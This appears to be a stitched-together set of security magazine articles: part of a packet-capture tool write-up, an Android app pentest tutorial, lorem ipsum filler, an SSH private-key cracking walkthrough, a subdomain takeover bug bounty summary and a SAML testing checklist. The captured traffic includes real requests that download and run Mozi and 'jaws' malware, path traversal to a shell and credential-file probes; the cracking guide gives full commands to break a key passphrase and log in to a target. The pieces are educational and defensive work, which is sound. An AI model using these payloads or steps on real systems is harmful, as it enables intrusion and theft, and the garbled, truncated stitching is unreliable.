We ran the sensors and receivers for 24 hours, looking for interesting HTTP requests (tshark -Y http) to the target servers.  We saw hundreds of drive-by attempts from dozens of different PI addresses, trying to find unprotected secrets, find vulnerable control panel components, use injection to install malware, etc.  

Requests ranged from an innocuous-looking ‘GET http://example.com/’, to much more significant attempts; a small selection of the captured traffic is listed below (IP addresses obfuscated):

HTTP 295 GET /.env HTTP/1.1

HTTP 307 GET /.aws/credentials HTTP/1.1

HTTP 86 POST /.aws/credentials HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 599 POST /boaform/admin/formLogin HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 335 GET /_ignition/execute-solution HTTP/1.1

HTTP 292 GET //robots.txt HTTP/1.1

HTTP 306 GET //.well-known/security.txt HTTP/1.1

HTTP 293 GET //sitemap.xml HTTP/1.1

HTTP 176 GET http://example.com/ HTTP/1.1

HTTP 796 GET /Rh-aD.nSuH_ HTTP/1.1

HTTP 941 GET /yTHlRfsRgMPOmMR2kd4Hc765I/mC/mqqE3ohONMZfZP0WUJFGFSGhlX/j1?KAwuc=ymn5Jdu96Iip_MOYa9.dTr3U7Yc&wpaCkwFkjcIU=0llrN&E0LYUK=cn.X2DT4AKByeQVWUK-gOED5Vk HTTP/1.1

HTTP 416 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 86 POST /assets/images/get.php HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 573 GET /dup-installer/main.installer.php HTTP/1.1

HTTP 296 GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.19/jaws;sh+/tmp/jaws HTTP/1.1

HTTP 302 GET /actuator/gateway/routes HTTP/1.1

HTTP 336 GET /shell?cd+/tmp;rm+-rf+*;wget+http://13.25.90.45:34416/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

HTTP 302 GET /.git/config HTTP/1.1

HTTP 86 POST /assets/images/go.php HTTP/1.1  (application/x-www-form-urlencoded)

HTTP 378 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

HTTP 506 POST /cgi-bin/ViewLog.asp HTTP/1.1  (application/x-www-form-urlencoded)Continuation

HTTP 385 POST /GponForm/diag_Form?images/ HTTP/1.1

HTTP/XML 673 POST /Autodiscover/Autodiscover.xml HTTP/1.1

HTTP 307 GET /solr/admin/info/system?wt=json HTTP/1.1

HTTP 320 CONNECT 46.38.62.96:443 HTTP/1.1

HTTP 327 CONNECT t2.proxy-checks.com:443 HTTP/1.0

HTTP 391 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1

HTTP 363 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1

HTTP 307 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1

HTTP 191 GET /manager/text/list HTTP/1.1

HTTP 418 GET /config/getuser?index=0 HTTP/1.1

You can store the results locally in a pcap file for more detailed, later analysis, or (feature in development) write them to an S3 bucket.  You can analyze them using any tool that can process pcap data.

Conclusion

PacketStreamer was developed by Deepfence as part of a bigger observability and security analytics product.  We’ve open-sourced it because, to the best of our knowledge, there are no existing tools that capture and merge multiple pcap streams, and function across Kubernetes, Docker, Fargate and operating system environments.  

We’d welcome any feedback, contributions and suggestions. Please start with the PacketStreamer GitHub repository, and feel welcome to join the Deepfence Community Slack.

by Gabrielle Botbol 

About the author

Gabrielle Botbol is a pentester, cyber security blogger, and podcaster CS by GB - Cybersecurity By Gabrielle B   

She created a self study program to become a pentester.

Gabrielle Botbol focuses her efforts on democratizing information security for all.

She is a board member of Ecole Cyber in Montreal.

She was honored for her contributions to the cyber community by being named one of the top 20 women in cyber security in Canada in 2020 and in 2021 Pentest Ninja by Women’s Society of Cyberjutsu.

She is mindful of the immense work that needs to be done to protect our privacy, our economy, our democracy, and our sovereignty. Her mantra is “Action for Cyber Peace”. Building it a little bit every day.

Introduction

Mobile pentesting is part of the pentester's testing routine. However, it is not widely documented. In the life of a pentester, at one time or another, we have to conduct mobile pentests because the needs are getting bigger. This article deals with an essential part: how to do a setup to test Android applications. I will also present the process of pentesting an Android application and give some practical examples.

Note 

This article will not cover certificate pinning, however, you will find in the resources a few links about the subject.

The Android application I used for the examples is PIVAA, a willingly vulnerable application. You can get it here and hack it; it was made for this purpose :D https://github.com/htbridge/pivaa 

All the installs and setups were made on Ubuntu.

How to set up the lab

In order to set up the lab, we will need to install the following tools:

  • JADX-GUI
  • adb
  • Android Studio
  • BurpSuite (Community edition works fine)

How to install JADX

In order to install JADX, you need to make sure you have Java installed. If not, you can install it with:

sudo apt install default-jdk

Once this is done, you can install JADX using this command:

sudo apt install jadx 

Finally, you can launch it using (jadx-gui binary is located here: jadx/bin):

./jadx-gui

For more information on jadx or the installation instructions for other systems, check out this link: https://github.com/skylot/jadx 

How to install adb

To install adb you just need to do:

sudo apt-get install adb  

The developers Documentation on adb is complete, check it out here: https://developer.android.com/studio/command-line/adb 

For installation instructions on other systems, check out this link: https://www.xda-developers.com/install-adb-windows-macos-linux/ 

How to install Android Studio

Android Studio’s installation is pretty straightforward ;

  1. Go to this link: https://developer.android.com/studio
  2. Click on download (it should be appropriate to your OS)

Then you should be good to go!

How to setup an emulator on Android Studio

In order to set up an emulator, you need to:

  1. Go to AVD Manager:
  2. Click on “Create Virtual Device”
  3. Choose a phone you like:
  4. Click on next and in the next screen click on x86 Images.
  5. Choose an image with an API Level adapted to the application you are going to test (I am going to use API 26 for this example).You might need to Download the image first and make sure it has Google APIs specified.
  6. Once downloaded, you can select it and click next and then finish.

For now, you will be able to launch it using the start button:

How to install BurpSuite

As for Android Studio, to install BurpSuite (Community edition), you just need to go to this link: https://portswigger.net/burp/releases/professional-community-2021-12-1?requestededition=community and get the proper version for your operating system.

How to setup BurpSuite with the emulator

In order to intercept the request with BurpSuite, we have some setup to do.

In BurpSuite, we need to download the certificate:

  1. Go to the Proxy tab then click on Options
  2. Click on the Import / Export CA certificate button
  3. Check the Certificate in DER format option then click on Next
  4. Choose a file with the Select file ... button and rename it as you wish but change the extension to “.cer”.

The certificate is now exported in the folder you have chosen and you should see the message:

Now we have to drag and drop it in the emulator. Once it is copied, we have to set in the emulator. Note that I am using a Nexus 5 with API 23 the process might differ with another emulator.

  1. Go to Settings> Security
  2. Click on Install from SD card:
  3. The certificate should be in Internal storage > Download. Double click on it:
  4. Name it and click OK.
  5. It is going to ask you to set a lock screen PIN code; click OK and proceed. I usually do not set a PIN to start the device
  6. Type and confirm your PIN. It should say that the certificate is installed.
  7. Accept the warning by clicking OK.

Now we have to set up the proxy settings of the emulator.

  1. Click the three dots on the side of the emulator:
  2. Go to Settings on the Proxy tab and make the following setup by clicking Apply:

Now we have to go on Burp:

  1. Within the Proxy tab, click on the Options subtab and in the Proxy Listeners section, click on the Add button, and set it up as follows:

And then click OK and Yes.

Your table of proxy listeners should look like this:

Now that the installation and configuration are done, we can dive into the pentest process. 

Usual process for Android application pentest

I am not going to cover the reconnaissance phase as it is similar to many other pentest types. 

So once you have done the reconnaissance phase, you can start to dive in to your application pentest.

The other steps are: Static Analysis, Dynamic Analysis and, of course, the report.

Static Analysis

To process the static analysis, we are going to use jadx-gui.

Once you have launched JADX, you will be greeted with this window:

Choose the desired APK (in our case, pivaa.apk) and click on Open File.

You will then be able to navigate in the source code:

The Android XML manifest

An interesting file to check is AndroidManifest.xml. You can find it here:

This file is the place where the developers will describe essential information about the application. As stated in the Android’s developer documentation:

Every application project must have an AndroidManifest.xml file (with precisely that name) at the root of the project source set. The manifest file describes essential information about your application to the Android build tools, the Android operating system, and Google Play.” (reference: https://developer.android.com/guide/topics/manifest/manifest-intro)

This will be used to mention the application package’s name, its components, the permissions, and the hardware and software this application needs.

Note that it is also useful to check out which API we need to test the application by having a look at the minSDKVersion attribute (see within the manifest).

In PIVAA for example you can see here all the permissions required by the application:

    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.READ_PROFILE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.NFC"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>

As the goal of the permission is to protect the privacy of the user, you might see some permissions here that should not be allowed, depending, of course, on the purpose of the application. The full list of permissions is available online. https://developer.android.com/reference/android/Manifest.permission 

Allow backup

The allowBackup flag could allow an attacker to take the backup of the application’s data with adb. So it would be safer to put it as false, and beware that, as mentioned in the OWASP documentation, if this attribute is not explicitly set up, it is enabled by default! (https://github.com/OWASP/owasp-mstg/blob/8d67a609ecd095d1bb00aa6a3e211791af5642e8/Document/0x05d-Testing-Data-Storage.md#static-analysis-7).

In our example on PIVAA it is set to true:

android:allowBackup="true"

Debuggable

This flag will mention if the application can be debugged. It should be set to false, otherwise an attacker could use it to access the application data. Be aware that sometimes your customer will give you the developer version of the application, so this flag will be set to true. What I usually do in this case is that I mention it as informational as a reminder for the customer to make sure that they will change this when they deliver the application in production.

In our example on PIVAA, this is set up to true:

android:debuggable="true"

OWASP provides useful documentation about this topic. [Cite here]

https://github.com/OWASP/owasp-mstg/blob/53ebd2ccc428623df7eaf2361d44b2e7e31c05b9/Document/0x05i-Testing-Code-Quality-and-Build-Settings.md#testing-whether-the-app-is-debuggable-mstg-code-2 

Which activities are exportable

The Activities are the screens of the applications. Depending on the application and the activity some of them should not be exportable because this means that they could be accessed from the outside of the application. So we will need to check if these specific exportable activities disclose sensitive data.

In our example, three activities are exportable:

  <service android:name="com.htbridge.pivaa.handlers.VulnerableService" android:protectionLevel="dangerous" android:enabled="true" android:exported="true"/>
        <receiver android:name="com.htbridge.pivaa.handlers.VulnerableReceiver" android:protectionLevel="dangerous" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="service.vulnerable.vulnerableservice.LOG"/>
            </intent-filter>
        </receiver>
        <provider android:name="com.htbridge.pivaa.handlers.VulnerableContentProvider" android:protectionLevel="dangerous" android:enabled="true" android:exported="true" android:authorities="com.htbridge.pivaa" android:grantUriPermissions="true"/>

General tips

Other than what we just saw, here are some general tips on what to look for during static analysis.

  • It is also worth checking the Strings.xml file
  • We can also try to enumerate a database (there is even a tool for this: Firebase Enum https://github.com/Sambal0x/firebaseEnum)
  • Enumerate public resources in cloud (see this tool here: Cloud Enum https://github.com/initstring/cloud_enum
  • Lookup for secret keys, credentials, comments, URLs, IP address, private keys, any sensitive information that should not be in the code.

With JADX-GUI you can also use the global search to lookup for specific strings, for example: API, API_KEY, pass, key, ClientId, ClientSecret, id, AWS, Secret, username, firebase.io, http, https, SQL (and extensions for sql file like .db, .sqlite, etc).

Here is how to do this:

  • Click on this little button on the top left:
  • Type the String you are looking for:
  • Check out the results!

In our example in PIVAA, we are able to find the database using this trick (we could also have checked the data/data directory right away, this is one of the thing we should do during an Android application pentest anyway):

So now we know that we have a class called DatabaseHelper.

So the next step here would be to find this database in the emulator.

We can look for this either using adb shell or just by checking the data folder in the Device File Explorer on Android Studio and we can find our databases here:

(data/data/com.htbridge.pivaa/databases):

So now we just have to pull the files using adb:

user ~/folder/mobile $ adb pull /data/data/com.htbridge.pivaa/databases/pivaaDB
/data/data/com.htbridge.pivaa/databases/pivaaDB: 1 file pulled. 7.5 MB/s (20480 bytes in 0.003s)

We can use SQLiteBrowser to read it (install it with sudo apt install sqlitebrowser):

user ~/folder/mobile $ sqlitebrowser pivaaDB

And we can see the data and the tables:

In general, databases file are useful to check for Insecure Data Storage (see here for more information on this: https://owasp.org/www-project-mobile-top-10/2014-risks/m2-insecure-data-storage)

In our example, this is a vulnerability for the following reason:

The mobile application uses an unencrypted SQLite database. This database can be accessed by an attacker with physical access to the mobile device or a malicious application with root access to the device. The application should not store sensitive information in clear text.” (PIVAA documentation: https://github.com/HTBridge/pivaa#cleartext-sqlite-database)

For more information on static analysis, checkout hacktricks: https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting#static-analysis 

Dynamic Analysis

Once you are all set up with Burp following the setup process I showed earlier you can start the dynamic analysis.

General tips

Here are some of the things you can check:

  • Are screens visible with screen capture and instance captures when you visit them with sensitive data in it?
  • Tapjacking
  • And all the usual Web application vulnerabilities (OWASP Top 10)

For more informations on the dynamic analysis you can check the following links:

Example of vulnerability

In the application you are testing, go in a screen in which you have sensitive data (for the demo, it is not going to be the case but let us just assume it for the example). In PIVAA, I am going to use the About the Application page.

When you use another application or click on the Home button, the application you are currently using is sent to the background. If you were looking at a screen with sensitive data and if it shows when you check the list of backgrounded applications, it is a vulnerability you have to report.

Here is how it looks:

  • Here I am using the application:
  • I click on the Home button to check something else on the phone
  • If I check the backgrounded application, I can see that PIVAA has kept a capture of the page I was currently looking at in the background:

This should not happen if the screen contains sensitive data. An additional check can be made in the static analysis step of the process by checking if the FLAG_SECURE is set (see here for more info: https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#static-analysis-8).

How to report what you find

Structure of a pentest report

Here is what a pentest report should look like:

Executive summary

The executive summary is the part addressed to the executive of the company who will read the report. It needs to be high-level explanations with no technical detail. It contains a global posture that explains why the findings and attack combination could impact the company.

Vulnerability report

The vulnerability report will have all the elements you see on the picture above.

  • Severity: The severity is usually in one word: low, medium, high or critical.
  • Score: The CVSS Score or OWASP risk rating score. This can be calculated with dedicated online tools (https://www.first.org/cvss/calculator/3.0 or https://www.owasp-risk-rating.com/). 
  • Affected item: The detailed description of the affected item.
  • Description: A detailed description with technical details on how the flaw can be reproduced.
  • Remediation: An explanation on how to correct it.
  • Evidence: A screen capture and/or request and/or response as evidence of the exploitation that you were able to conduct (during the attack phase, you should have taken as many notes as possible along with screenshots and request/response from Burp, anything useful to prove the vulnerabilities and allow the person who will read your report to reproduce the exploit).

Example of a vulnerability report part

Let’s see the vulnerability report part more precisely with the example.

  • Information disclosure through backgrounded screens of the application

Severity: Low

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Description

In order to provide visual transitions in the interface, Android records a screenshot of the current application screen. This happens when an application is suspended, when the button that leads to the main menu is pressed, when receiving a call, or any other event that may interrupt the application. These captures can contain user information or other sensitive data.

Also, the application does not leverage the FLAG_SECURE setting to protect sensitive data that should be leaked.

This way, the attack surface of the mobile application is expanded. Confidential information can be persisted on the mobile device through this mechanism.

Resource https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06d-Testing-Data-Storage.md#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9 

Remediation

Using the FLAG_SECURE setting in screens with sensitive data will prevent their contents from being in backgrounded screenshots.

Evidence

  • Sensitive data shown in the backgrounded application:

 

Thanks for reading, I hope you enjoyed this article.

Resources

teting

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.

Crack SSH Private Key with John the Ripper

by Anastasis Vasileiadis


The SSH private key code should not be just a decoration. Unfortunately, some people think they will never lose their SSH private key and neglect to use a strong password.

In the guide 10 simple steps for a secure SSH we saw the SSH (from Secure Shell) protocol which is used for secure (encrypted) connections with remote computers / servers. It is used not only to execute commands in the server's terminal but also to transfer files to and from the server (e.g. with FileZilla to transfer files to the Server) or even to transfer audio via ssh.

So you understand from the above its “power” and how important it is to have a secure ssh. Unfortunately, some do not realize the seriousness of the issue and sufferers of the “will it happen to me?” syndrome. Servers become the pawns of the FritzFrog Botnet |Attacks on SSH servers by a sophisticated peer-to-peer (P2P) botnet that compromises SSH servers.

As for the SSH code and what a strong password is, you don't need to be educated, three or four simple words joined by punctuation marks is a good and secure model for passwords and passwords.

Password Strength
source: https://xkcd.com/936/

Just make sure you remember the password. So in the following scenario, we'll see what happens if you haven't dealt with it in the first 10 minutes on a new Server with Basic security settings, or you managed to lose your SSH private key to which you had put an easy code.

Install SSH2John on your computer

SSH2John is If you do not have the Jumbo version of John the Ripper installed, you will need to download ssh2john from GitHub, as it is not included on Kali Linux. If you don't have John the Ripper installed, you can learn how to install it from his GitHub.

We open a terminal and download it:

~# wget
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03--
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-
KB/s in 0s

Now let's crack the SSH private Key.

Crack the private key

All we need to do is run the ssh2john tool against the private key and redirect the results to a new hash file using:

python ssh2john.py id_rsa > id_rsa.hash

Next, we'll use it John the ripper to crack the password. But first, we need a proper word list. For the purposes of this guide, we will use a small one that has 100 words to show how to do it in a simple way. Download it:

~# wget
https://raw.githubusercontent.com/danielmiessler/SecL
ists/master/Passwords/darkweb2017-top100.txt

Now run John on Kali Linux as usual, feeding it the wordlist and hash file:

john --wordlist=darkweb2017-top100.txt id_rsa.hash


Note: This format may emit false positives, so it
will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key
for status
1q2w3e4r5t (id_rsa)
Session completed

We can see that it recognized our password, but to be sure, let's use the command –show to verify it:

john --show id_rsa.hash
id_rsa:1q2w3e4r5t
1 password hash cracked, 0 lef

As you can see, even 1q2w3e4r5t what to the common eye may seem hard to crack...unfortunately for you who use it...is a matter of vocabulary.

SSH access to the victim

With the key broken, all that remains is to use it against the target for which the particular key is being used. Using the option -i in the SSH command, we can specify the private key to use for authentication:

ssh -i id_rsa user@10.10.10.10
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT
accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
luser@10.10.10.10's password

It won't let us use the key if the permissions are too ... loose. So all we have to do is set some stricter permissions to use the private key:

chmod 400 id_rsa

Now we are able to connect. Then, we enter the password that we
have cracked, and the message shows that we are connected:

~# ssh -i id_rsa nullbyte@10.10.10.10
Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
luser@target:~$

Epilogue

In this short guide, we have seen how one can crack SSH passwords.

In most cases these are done massively and automatically and SSH keys are broken like lettuce leaves if we do not pay attention to the overall security of our system, and we have the illusion that since we have a Linux Server we are safe. As you may have read in Enough with the FUD about Linux security holes, you will understand that security is not an end product but an ongoing process.

Fastly Subdomain Takeover $2000

Bug Bounty — From zero to HERO

by Alexandar Thangavel AKA ValluvarSploit


# Passive Subdomain Enumeration using Google Dorking
site:*.redacted.com -www -www1 -blog
site:*.*.redacted.com -product

# Passive Subdomain Enumeration using OWASP Amass
amass enum -passive -d redacted.com -config config.ini -o amass_passive_subs.txt

# Subdomain Brute force using Gobuster
gobuster dns -d redacted.com -w wordlist.txt - show-cname - no-color -o gobuster_subs.txt
# Merging subdomains into one file
cat google_subs.txt amass_passive_subs.txt gobuster_subs.txt | anew subdomains.txt
# Enumerate CNAME records
./cname.sh -l subdomains.txt -o cnames.txt

# We can use HTTPX tool as well
httpx -l subdomains.txt -cname cnames.txt
# Probe for live HTTP/HTTPS servers
httpx -l subdomains.txt -p 80,443,8080,3000 -status-code -title -o servers_details.txt
dig next.redacted.com CNAME
DNS query for CNAME record
https://next.redacted.com [500] [246] [Fastly error: unknown domain next.redacted.com]

 

Claimed domain on Fastly
mkdir hosting

cd hosting

nano index.html
<!DOCTYPE html>

<html>
    <head><title>STO PoC</title></head>
    <body>
        <h1>ValluvarSploit PoC</h1>
    </body>
</html>
python3 -m http.server 80
VPS Configuration
Proof of Concept
Monitoring server logs for fun
Reward

Originally posted at: https://infosecwriteups.com/fastly-subdomain-takeover-2000-217bb180730f

AppSec Tales X | SAML

by Karol Mazurek


Application Security Testing of the SAML protocol guidelines.

The article describes the Application Security Testing of the SAML.
The advice in this article is based on the following:

Constantly update the tools.

Upgrade Burp Suite with the following extensions:

Source:
Source:
/saml
/saml2
/saml/login
/saml2/login
/saml/auth
/saml2/auth
/saml/init
/saml2/init
/saml/consume
/saml2/consume
/simplesaml/module.php/core/loginuserpass.php
/simplesaml/saml2/idp
AuthState
SAMLRequest
authenticity_token
SAMLResponse
RelayState

Modify the SAML response.

  • The attackers can forge the ID data in the SAML response at will.
Source: Own study — Testing SAML Unverified Signature.
Source: Own study — Example request with a SAML Response Token viewed in the EsPReSSO extension.
Source: Own study — Testing Unverified Signature, by changing the ID data inside a SAML Response Token.

Implement the .

Modify the SAML response & remove the Signature.

  • The attacker can remove the content of the signature tag or delete the whole signature to bypass the security measure.
Source: Own study — Two methods for testing SAML Signature Stripping.
Source: Own study — Testing Signature Stripping using SAML Raider.
Source: Own study — The example content of the Signature to remove.

Implement the .
Always verify the signature, even if there is no value.

Check if you can guess the signature.

  • The attacker can forge a signature if the signing mechanism is weak or predictable.
  • In the below example, the attacker could forge an assertion and obtain a valid session as an admin@afine.com user.
Source: Own study — Testing predictable signing mechanism.

Ensure all SAML elements in the chain use .
Consider deprecating support for .

Search the internet to find the secret key for the certificate in use.

  • The attacker can forge messages if he knows the secret.
Source: Own study — Testing for the default key pair.
Source: Own study — Example of a X.509 certificate.
Source: Own study — How to copy the certificate in PEM format to the clipboard.
Source: Own study — Example fingerprinting using openssl.
  • It is handy to use an alias for fingerprinting the x509 certificates:
function fingerprint_x509() {
        openssl x509 -in "$1" -noout -fingerprint
}
Source: Own study — Example of a Google Dorking using the exact fingerprint value.
Source: Own study — Example searching for the certificate in the cloned code repository.
Source: Own study — How to get the first 64 chars of the certificate using Python Interpreter.
Source: Own study — Example of a default private key in the code repository.
Source: Own study — Re-signing the forged SAML with an imported private key.
Source: Own study — Importing private key to the SAML Raider Certificates.
Source: Own study — Solution for the not showing imported certificate.

Do not use the default key pair in the production environment.
Always generate new key pair and store the secret in a secure way.
Do not disclose the secret publicly.

Inject a self-signed certificate and sign the assertion using it.

  • The attacker can forge messages using self-signed certificates.
Source: Own study — Testing flow for the certificate replacement attack.
Source: Own study — Resigning the Assertion using a self-signed certificate.

Service Provider should verify that a trusted Identity Provider signed the SAML.

Test for all eight XSW attacks using SAML Raider.

  • The attacker can inject arbitrary content.
Source: Own study —Testing the XML Signature Wrappings attacks.
Source: Own study — Testing XSW1 attack using SAML Raider extension.
Source: Own study — Mindmap, briefly explains all eight XML Signature Wrapping attacks.

Validate the signature according to the .

Swap the ServiceURL during login from SP1 to SP2.

  • The attacker can get access to the forbidden service provider.
  • For example, there are two applications (admin panel and sales).
  • The attacker has access only to the sales page using normal SAML flow.
  • Using the TRC technique, the attacker can change the ServiceURL to an admin panel during login to the sales application.
Source: Own study — Testing the TCR.
Source: Own study — The example login flow with the changed ServiceURL within the SAMLRequest parameter.
Source: Own study — The decoded value of a SAMLRequest parameter with changed ServiceURL value.

Service Provider should always validate the recipient value.

Register the account with the comment and use the SSO.

  • The attacker can hijack other users' accounts.
Source: Own study — Testing for comment injection vulnerability.

The detailed testing of the registration process was described in:

Register a similar account and use a comment to strip the part of it.

  • The attacker can hijack other users’ accounts.
Source: Own study — Testing for comment injection vulnerability.

Use the .

Test for the XXE injection.

  • Depending on the flaw found, the attacker could exploit Directory Listening, file reading, Server Side request forgery, or Denial of a Service attack.
Source: Own study — Testing for the XXE vulnerabilities.
<?xml version="1.0" encoding="UTF-8"?
Source: Own study — Using the SAML tab to generate the XML code for testing the XXE.

Ensure that all SAML providers/consumers do proper .
Disable DTD processing.

Test for the XSLT injection.

  • Depending on the flaw found, the attacker could exploit Directory Listening, file reading, Server Side request forgery, or Denial of a Service attack.
Source: Own study — Testing for the XSLT vulnerability.
Source: Own study — Using the SAML tab to generate the XML code for testing the XXE.

Ensure that all SAML providers/consumers do proper .

Check if data is transferred via HTTP or as a parameter in the URL.

  • Sensitive data may be logged by the browser, the web server, and forward or reverse proxy servers between the two endpoints.
  • It could also be displayed on-screen, bookmarked, or emailed around by users.
  • When any off-site links are followed, they may be disclosed to third parties via the Referer header.
Source: Own study — Example of the sensitive data transmitted in the path using HTTP.

Use a secure Hypertext Transfer Protocol (HTTPS).
Use an alternative mechanism for transmitting session tokens, such as HTTP cookies or .

Register twice using SSO and with an email&password.

  • The attacker could hijack an account that the user created with OAuth.
  • The attacker could set a trap by registering an account using the victim’s email and waiting for the victim to log in using the OAuth method.
Source: Own study — Testing .

Email validation should be implemented.

Check if the validation time is bigger than 5 minutes.

  • The attacker could reuse the SAML Response Token.
Source: Own study — Testing Overlong Expiration Time on the SAML Response Token.

The SAML Response Token should be rejected after 5 minutes.

Check if you can use the same SAML Response Token twice.

  • The attacker could reuse the SAML Response Token.
Source: Own study — Testing Reusable SAML Response Token.

Each of the SAML Response Token should be single use only.

Exchange one SAML Response Token for many session tokens.

  • The malicious application could persistently maintain access to users despite deauthorizing the application.
  • Creating Fake Followers, likes, and subscribers.
  • Money loses in the case of single-use code coupons.
Source: Own study — Testing the race condition in SAML flow.

Only one SID should be gained in exchange for a single SAML Response Token .

Conduct the input validation testing in all SAML fields.

  • The impact depends on the type of vulnerability detected.
 - comprehensive wordlist for fuzzing.

Some payloads send the ICMP packets or TCP packets on port 80 when the payloads are triggered (if the potential vulnerabilities were found).

You need to start two listeners on your VPS to make them work:

Source: Own study — Starting the ICMP sniffer.
Source: Own study — Starting the HTTP server on port 80.

Check the from OWASP.

The SAML protocol is not easy to implement, so ensure you do it properly.
I am sure that my article and the below references will help you do so: